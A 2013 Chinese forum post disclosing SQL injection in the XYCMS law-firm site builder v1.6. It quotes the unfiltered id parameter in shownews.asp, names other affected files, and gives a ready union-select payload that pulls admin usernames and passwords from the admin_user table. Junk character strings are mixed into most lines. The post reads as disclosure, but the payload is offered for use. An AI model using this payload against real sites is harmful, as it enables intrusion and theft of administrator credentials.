前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
% L5 k! _6 ]7 {! ?
5 U( i+ s. g% j$ s' [6 w/ @淫荡分割线7 _+ ]5 J5 M1 [# l: @
--------------------------------------------------------. |7 t' O6 d/ d: [
3 l! |1 i$ \4 b" Z* l3 C& K. w审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
7 q2 X% y# n. m$ o8 f# i- n" t源码地址:http://down.chinaz.com/soft/29233.htm6 A3 Q6 f, U. r [! v6 p
5 s7 l) b3 j" z# R: L9 Q, h漏洞文件:shownews.asp
( \4 Y$ i& L% V9 j漏洞代码:7-13行. q6 [7 B4 ?: y1 }4 S, f$ @: q
/ \' q- g+ h% h4 m7 U% y4 h _2 [: T- f0 E9 F& |4 y
<%
5 t! k/ Z! W: r) a! S- hid=request.QueryString("id")# `6 {4 F0 ?* J' q# C
; f3 z# U5 e3 ]; eset snews=server.createobject("adodb.recordset")
; M( ~ ^& V: E( y9 |exec="select * from [news] where id="&id5 T& D0 ^, ?* W; v8 e% A/ b+ E
snews.open exec,conn,1,17 a1 w: u. l/ ]7 r# L
%>
( ^5 ^. \: U( s0 R7 ^ ; H" s9 Q% C# i( B3 y7 [/ Z: Z N
# M; W' k4 F0 i7 z7 b# h T什么过滤都没有 直造成注入" J7 L" T4 P3 ^ z# [4 Y/ i
' F& o, ^# h/ V$ j
注入点:http://127.0.0.1:99/shownews.asp?id=xx6 M& q$ o" v0 Q5 ^
3 a7 I8 v6 \6 p' c" U( c
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
( K: f9 k, m! P1 L9 X5 x2 c 5 J# _. I# I, ^! I6 x" V0 m
; p0 ?! F9 j2 f9 n" c' i, Dexp: union select 1,admin,password,4,5,7 from admin_user
# Z8 h6 `8 ]7 l0 s6 Q2 R- L: E$ l) Z
|
发表于 2013-4-4 17:28:12
收藏
支持
反对